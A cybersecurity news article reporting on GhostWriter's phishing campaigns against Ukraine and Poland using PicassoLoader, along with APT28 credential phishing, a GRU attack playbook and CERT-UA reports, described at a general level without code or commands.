Government entities, military organizations, and civilian users in Ukraine and Poland have been subjected to a prolonged series of targeted campaigns aimed at stealing sensitive data and establishing persistent remote access to compromised systems.
Furthermore, these attacks, attributed to a threat actor known as GhostWriter, exploit phishing lures and decoy documents to distribute PicassoLoader malware, which serves as a conduit for launching Cobalt Strike Beacon and njRAT. The attacks involve a multistage infection chain initiated with malicious Microsoft Office documents, predominantly in Excel and PowerPoint formats, followed by an executable downloader and payload concealed within an image file for enhanced evasion.
While a subset of these attacks has previously been documented by Ukraine’s CERT-UA and Fortinet FortiGuard Labs, the recent disclosure sheds further light on the activities of GhostWriter. The infection chains rely on persuading victims to enable macros, which triggers the deployment of PicassoLoader and subsequent retrieval of the final malware payload embedded within a legitimate image file.
At the same time, GhostWriter’s priorities are believed to align with the Belarusian government. Other threat actors, including the Russian APT28 group, have also targeted Ukraine through phishing emails employing HTML attachments that prompt recipients to change their passwords on platforms like UKR.NET and Yahoo!, redirecting them to fraudulent landing pages for credential theft.
In addition to GhostWriter’s activities, the adoption of a “standard five-phase playbook” by hackers associated with Russian military intelligence (GRU) has contributed to the escalation of disruptive operations against Ukraine.
This playbook involves leveraging living-on-the-edge infrastructure, employing living-off-the-land techniques for reconnaissance and lateral movement, establishing persistent access through group policy objects (GPO), deploying wipers, and using Telegram hacktivist personas to communicate their acts. The adoption of this playbook suggests that Russia’s wartime goals have influenced the GRU’s strategic approach, allowing for increased speed, scale, and intensity in their attacks.
The disclosure of these campaigns coincides with CERT-UA’s report on various phishing operations distributing the SmokeLoader malware, as well as a smishing attack targeting Telegram accounts.
It highlights the ongoing cyber espionage efforts against state organizations and media representatives in Ukraine, where email and instant messengers are used to distribute files that execute PowerShell scripts to retrieve browser stealers and keyloggers. The combined activities of GhostWriter, APT28, and GRU-associated hackers underscore the persistent and multifaceted threats faced by Ukraine’s cybersecurity landscape.
